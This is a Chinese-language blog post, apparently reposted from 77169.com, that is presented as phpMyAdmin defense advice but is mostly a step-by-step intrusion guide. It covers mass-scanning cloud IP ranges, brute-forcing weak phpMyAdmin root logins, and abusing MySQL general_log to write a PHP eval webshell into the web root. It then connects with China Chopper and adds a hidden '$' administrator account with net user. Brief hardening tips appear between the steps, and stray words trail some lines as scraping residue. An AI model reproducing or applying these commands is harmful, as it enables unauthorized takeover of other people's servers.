phpmyadmin安全預防

頭疼的安全

以前服務器老是本人黑,千瘡百孔,只能一步步的去作一些安全防範,如何防範天然先從如何滲透開始.php

文章及建議

前段時間看到了個phpmyadmin提權的教程,不少人都說如今那裏還有root賬號root密碼這種弱口令,今天給你們來一套完整的教學。html

首先百度XX雲X地區的IP段(你要是連幾個國內雲服務運營商的名字都不知道,那我就真的沒辦法了)。mysql

phpmyadmin從找目標到拿下服務器

找到之後百度隨便找個工具掃描IP段,大的運營商通常直接後兩個大段都是他的git

而後找到IP段之後直接找一個80端口批量掃描的工具掃80端口,直接掃兩個大段github

我用的這個叫S-Xing,百度來的,不知道有沒有後門,因此就不提供了sql

phpmyadmin從找目標到拿下服務器

phpmyadmin從找目標到拿下服務器

掃描好之後導入剛纔掃描好的IP數據庫

phpmyadmin從找目標到拿下服務器

而後選擇自動後綴安全

phpmyadmin從找目標到拿下服務器

線程根據本身配置來配置,我直接選擇最高500,而後開始爆破服務器

phpmyadmin從找目標到拿下服務器

爆破結果工具

phpmyadmin從找目標到拿下服務器

防範建議
這裏的話,想要防範這一步,能夠採起的方法有關閉phpMyAdmin,這個最直接了.
若是不關閉的話,建議更改訪問的端口號.
而後默認密碼必須修改,不可使用簡單密碼.
目錄的權限也最好降低到最低.

隨便選擇一個開搞

先看一下服務器信息xx.xx.xx.xx/l.php

phpmyadmin從找目標到拿下服務器

網站路徑什麼的都爆出來了,登陸後臺

phpmyadmin從找目標到拿下服務器

老規矩,查下mysql日誌文件路徑

phpmyadmin從找目標到拿下服務器

先修改日誌路徑到當前網站路徑,在開啓日誌,並插入一句話木馬,而後關閉日誌

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';

修改當前日誌文件到網站目錄下

set global general_log = "ON"; 開啓mysql記錄日誌

select '<?php eval($_POST[sean]);?>'; 插入PHP 一句話木馬

set global general_log = "OFF"; 關閉mysql記錄日誌

phpmyadmin從找目標到拿下服務器

執行成功

phpmyadmin從找目標到拿下服務器

接下來上菜刀鏈接上傳好的一句話木馬

phpmyadmin從找目標到拿下服務器

phpmyadmin從找目標到拿下服務器

net user admin$ sean2018.. /add & net localgroup administrators admin$ /add建立一個管理員帳號

phpmyadmin從找目標到拿下服務器

帳號已存在,那就直接修改密碼了,帶$符號的都是被影藏帳號,估計被日了多少次了吧

phpmyadmin從找目標到拿下服務器

接下來鏈接試試

phpmyadmin從找目標到拿下服務器

phpmyadmin從找目標到拿下服務器

防範建議
在這一步的話,防範的方法也有一些,比方說加一個安全狗軟件,算是不錯的了.
至於寫文件的這個權限,剛剛若是下降了,應該問題不大,不過也有能夠提高權限的一些工具,所以須要及時更新數據庫和系統的bug.
至於執行命令建立用戶的權限,只能簡單作好預防和按期查看了,基本上到了上一步,全部的權限和帳戶已經有了.到了這裏目前只有重裝系統,才能幹掉這個入侵者的份了.
固然,若是把全部的漏洞堵上,也能夠不重裝.可是後門太多,非專業人員,處理不會怎麼全面.

玩完,收工,文章內全部的工具,百度一搜索一大把,我也是百度來的,不知道有沒有後門因此就不提供下載了,怕中毒找個虛擬機搞,本身折騰吧。

華盟網原創,隨便轉載但請註明來自77169.COM,感謝支持!

本文章只作教學思路,請勿用於非法用途

說明

歡迎評論,歡迎指正,轉載也請註明出處.

參考文章

phpmyadmin從找目標到拿下服務器

版本說明

20180806 開始着手文章

20180807 文章完成時間

相關文章
相關標籤/搜索